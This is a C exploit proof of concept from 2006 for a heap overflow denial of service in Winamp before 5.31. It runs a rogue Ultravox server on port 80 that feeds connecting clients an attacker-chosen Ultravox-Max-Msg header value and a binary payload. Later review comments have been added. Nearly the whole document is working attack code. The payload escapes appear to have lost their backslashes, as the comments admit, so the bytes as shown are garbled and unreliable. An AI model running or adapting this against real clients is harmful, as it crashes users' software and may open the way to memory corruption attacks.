
# Title : Nullsoft Winamp <= 5.3 (Ultravox-Max-Msg) Heap Overflow DoS PoC
# Published : 2006-11-03
# Author : cocoruder


/************************************************************************************
Nullsoft Winamp < 5.31 Ultravox "Ultravox-Max-Msg" Heap Overflow DoS PoC

by cocoruder(frankruder_at_hotmail.com),2006/10/30

Run it as "winamp_unsv.exe ultravox-max-msg_value"; winamp_unsv (a simple Ultravox
server) will then listen on TCP port 80 and respond when Winamp connects to it via the Ultravox protocol.

usage example:
    winamp_unsv.exe 500000000
    winamp_unsv.exe 2147481601

**************************************************************************************/


#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
 
#define SERVER_PORT  80

/*
 * First part of the Ultravox response header, ending with the
 * "Ultravox-Max-Msg: " field name.  main() appends argv[1] (the header
 * value under test) and then buff1_header2 to it, and sends the result
 * as sizeof(...)-1 bytes, i.e. without the terminating NUL.
 *
 * NOTE(review): the escape sequences in this listing appear to have lost
 * their backslashes ("x0Dx0A" where CRLF escapes would be expected), so
 * the bytes as shown are the literal characters x, 0, D, x, 0, A rather
 * than a line ending.  Left exactly as extracted; verify against the
 * original source before relying on the byte content.
 */
unsigned char    buff1_header1[]=
"HTTP/1.0 200 OKx0Dx0A"
"Server: Ultravox 3.0x0Dx0A"
"Content-Type: misc/ultravoxx0Dx0A"
"Ultravox-SID: 13381x0Dx0A"
"Ultravox-Avg-Bitrate: 16000x0Dx0A"
"Ultravox-Max-Bitrate: 24000x0Dx0A"
"Ultravox-Max-Msg: ";

/*
 * Remainder of the Ultravox response header, appended by main() directly
 * after the argv[1] value.  As with buff1_header1, it is sent as
 * sizeof(...)-1 bytes.
 *
 * NOTE(review): same extraction artefact as buff1_header1 — the "x0Dx0A"
 * runs look like CRLF escapes that lost their backslashes.  Left as found.
 */
unsigned char    buff1_header2[]=
"x0Dx0A"
"Ultravox-Stream-Info: Ultravox;Live Streamx0Dx0A"
"Ultravox-Msg-Que: 42x0Dx0A"
"Ultravox-Max-Fragments: 1x0Dx0Ax0Dx0A";

//4294965247
//1073739776
//1073739775
//1000000000
// 500000000
//  50000000

/*
 * Body sent to the client immediately after the assembled header block;
 * main() transmits sizeof(buff2)-1 bytes of it.
 *
 * NOTE(review): every escape here also appears to have lost its backslash
 * in this listing, so as written the array holds the ASCII text of the
 * escapes, not the bytes they denote.  Read as escapes, the first part
 * looks like an XML "<metadata>" block followed by opaque binary data —
 * not decoded or reconstructed here; treat the content as unverified.
 */
unsigned char    buff2[]=
                                                        "x5ax00"
"x39x01x01xe0x00x01x00x01x00x01x3cx6dx65x74x61x64"
"x61x74x61x3ex3cx6cx65x6ex67x74x68x3ex30x3cx2fx6c"
"x65x6ex67x74x68x3ex3cx73x6fx6fx6ex3ex4dx6fx72x65"
"x20x6fx6ex20x54x48x45x20x35x30x73x3cx2fx73x6fx6f"
"x6ex3ex3cx73x6fx6ex67x3ex3cx6ex61x6dx65x3ex54x69"
"x6ex61x20x4dx61x72x69x65x20x28x31x39x35x35x29x3c"
"x2fx6ex61x6dx65x3ex3cx61x6cx62x75x6dx3ex47x72x65"
"x61x74x65x73x74x20x48x69x74x73x3cx2fx61x6cx62x75"
"x6dx3ex3cx61x72x74x69x73x74x3ex50x65x72x72x79x20"
"x43x6fx6dx6fx20x6fx26x23x34x37x3bx4dx69x74x63x68"
"x65x6cx6cx20x41x79x72x65x73x3cx2fx61x72x74x69x73"
"x74x3ex3cx61x6cx62x75x6dx5fx61x72x74x3ex78x6dx2f"
"x73x74x61x74x69x6fx6ex5fx6cx6fx67x6fx5fx35x2ex6a"
"x70x67x3cx2fx61x6cx62x75x6dx5fx61x72x74x3ex3cx73"
"x65x72x69x61x6cx3ex2dx31x3cx2fx73x65x72x69x61x6c"
"x3ex3cx73x6fx6ex67x5fx69x64x3ex2dx31x3cx2fx73x6f"
"x6ex67x5fx69x64x3ex3cx61x6dx67x5fx73x6fx6ex67x5f"
"x69x64x3ex2dx31x3cx2fx61x6dx67x5fx73x6fx6ex67x5f"
"x69x64x3ex3cx61x6dx67x5fx61x72x74x69x73x74x5fx69"
"x64x3ex2dx31x3cx2fx61x6dx67x5fx61x72x74x69x73x74"
"x5fx69x64x3ex3cx61x6dx67x5fx61x6cx62x75x6dx5fx69"
"x64x3ex2dx31x3cx2fx61x6dx67x5fx61x6cx62x75x6dx5f"
"x69x64x3ex3cx69x74x75x6ex65x73x5fx73x6fx6ex67x5f"
"x69x64x3ex2dx31x3cx2fx69x74x75x6ex65x73x5fx73x6f"
"x6ex67x5fx69x64x3ex3cx69x74x75x6ex65x73x5fx61x72"
"x74x69x73x74x5fx69x64x3ex2dx31x3cx2fx69x74x75x6e"
"x65x73x5fx61x72x74x69x73x74x5fx69x64x3ex3cx69x74"
"x75x6ex65x73x5fx61x6cx62x75x6dx5fx69x64x3ex2dx31"
"x3cx2fx69x74x75x6ex65x73x5fx61x6cx62x75x6dx5fx69"
"x64x3ex3cx2fx73x6fx6ex67x3ex3cx2fx6dx65x74x61x64"
"x61x74x61x3ex00x5ax00x80x03x03x67xffxf9x5cx40x0b"
"xc1x5cx01x62x31xa5xe3x40x0ex92xdax57x42x9cxfax68"
"xd3xb3xdbx4bx69x89x04x00x00x2bx8cxbbx5fx92xf3x34"
"x5ax91x5bx43xb0xe1x9bx2fx26x66x32x67x45x59x1ex3c"
"x68x87xfdx97x96xa5x75x18x0ax27x04x0fx09xebx20xb4"
"x92x0ex18xc5xbcxc8xf8xa6x51x12x29xe0xf9x81x1bxa6";

 
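/*
 * Entry point of the single-client Ultravox listener.
 *
 * argv[1] is inserted verbatim as the value of the "Ultravox-Max-Msg"
 * response header.  The program binds SERVER_PORT, accepts one client,
 * reads and echoes its request, answers with the assembled header block
 * followed by buff2, and then holds the connection open until the peer
 * closes it, after which everything is released and the process exits.
 *
 * Returns 0 on a clean run and -1 on a usage, allocation or socket error.
 *
 * Review notes on the original:
 *  - argv[1] was used without checking argc, so a bare invocation called
 *    strlen(NULL) (undefined behaviour).
 *  - Socket handles were held in int.  Winsock's SOCKET is unsigned and
 *    failure is reported as INVALID_SOCKET / SOCKET_ERROR; the error code
 *    comes from WSAGetLastError(), not errno, so perror() said nothing
 *    useful.  WSAStartup()'s return value was also ignored.
 *  - The recv()'d request was printed with "%s" without a terminator.
 *  - The literals in this listing appear to have lost their backslashes
 *    ("readyn" for "ready\n"); the diagnostics below are written with the
 *    intended escapes.  The payload arrays are left as found.
 *  - The final while(1) Sleep loop made closesocket() and return 0
 *    unreachable; the listener now exits once the peer disconnects.
 */
int main(int argc, char *argv[])
{
    WSADATA wsadata;
    struct sockaddr_in addr;
    char buffer[80];
    SOCKET listen_sd = INVALID_SOCKET;
    SOCKET accept_sd = INVALID_SOCKET;
    unsigned char *lpbuff = NULL;
    size_t h1len, arglen, h2len, bufflen;
    int on = 1;
    int rc;
    int ret = -1;

    if (argc < 2 || argv[1] == NULL || argv[1][0] == '\0') {
        fprintf(stderr, "usage: %s <ultravox-max-msg value>\n", argv[0]);
        return -1;
    }

    if (WSAStartup(MAKEWORD(2, 2), &wsadata) != 0) {
        fprintf(stderr, "WSAStartup() failed\n");
        return -1;
    }

    /* Build the response header once: header1 + argv[1] + header2.
     * Explicit memcpy with known lengths replaces the memset/strcat chain
     * and keeps a terminator so the buffer can also be printed if needed. */
    h1len = sizeof(buff1_header1) - 1;
    arglen = strlen(argv[1]);
    h2len = sizeof(buff1_header2) - 1;
    bufflen = h1len + arglen + h2len;
    if (bufflen > (size_t)INT_MAX) {
        /* send() takes an int length; an argument this long cannot be sent. */
        fprintf(stderr, "argument too long\n");
        goto out;
    }
    lpbuff = malloc(bufflen + 1);
    if (lpbuff == NULL) {
        fprintf(stderr, "malloc error!\n");
        goto out;
    }
    memcpy(lpbuff, buff1_header1, h1len);
    memcpy(lpbuff + h1len, argv[1], arglen);
    memcpy(lpbuff + h1len + arglen, buff1_header2, h2len);
    lpbuff[bufflen] = '\0';

    listen_sd = socket(AF_INET, SOCK_STREAM, 0);
    if (listen_sd == INVALID_SOCKET) {
        fprintf(stderr, "socket() failed: %d\n", WSAGetLastError());
        goto out;
    }

    rc = setsockopt(listen_sd, SOL_SOCKET, SO_REUSEADDR,
                    (const char *)&on, sizeof(on));
    if (rc == SOCKET_ERROR) {
        fprintf(stderr, "setsockopt() failed: %d\n", WSAGetLastError());
        goto out;
    }

    /* Bind to every local interface on SERVER_PORT. */
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(SERVER_PORT);
    if (bind(listen_sd, (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR) {
        fprintf(stderr, "bind() failed: %d\n", WSAGetLastError());
        goto out;
    }

    if (listen(listen_sd, 5) == SOCKET_ERROR) {
        fprintf(stderr, "listen() failed: %d\n", WSAGetLastError());
        goto out;
    }

    printf("The server is ready\n");
    printf("  waiting on accept()\n");
    accept_sd = accept(listen_sd, NULL, NULL);
    if (accept_sd == INVALID_SOCKET) {
        fprintf(stderr, "accept() failed: %d\n", WSAGetLastError());
        goto out;
    }
    printf("  accept completed successfully\n");

    printf("  wait for client to send us a message\n");
    /* Leave one byte for the terminator; recv() does not add one. */
    rc = recv(accept_sd, buffer, (int)sizeof(buffer) - 1, 0);
    if (rc <= 0) {
        fprintf(stderr, "recv() failed: %d\n", WSAGetLastError());
        goto out;
    }
    buffer[rc] = '\0';
    printf("  <%s>\n", buffer);

    /* Send failures are reported but, as in the original, do not abort. */
    rc = send(accept_sd, (const char *)lpbuff, (int)bufflen, 0);
    if (rc == SOCKET_ERROR) {
        fprintf(stderr, "send() header failed: %d\n", WSAGetLastError());
    } else {
        printf("send ultravox header OK!\n");
    }

    rc = send(accept_sd, (const char *)buff2, (int)sizeof(buff2) - 1, 0);
    if (rc == SOCKET_ERROR) {
        fprintf(stderr, "send() body failed: %d\n", WSAGetLastError());
    } else {
        printf("send ultravox first stream OK!\n");
    }

    /* Hold the connection open until the peer closes it (recv() returns 0)
     * or it fails; anything the peer sends meanwhile is discarded. */
    while ((rc = recv(accept_sd, buffer, (int)sizeof(buffer), 0)) > 0) {
        /* discard */
    }
    ret = 0;

out:
    if (accept_sd != INVALID_SOCKET) {
        closesocket(accept_sd);
    }
    if (listen_sd != INVALID_SOCKET) {
        closesocket(listen_sd);
    }
    free(lpbuff);
    WSACleanup();
    return ret;
}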
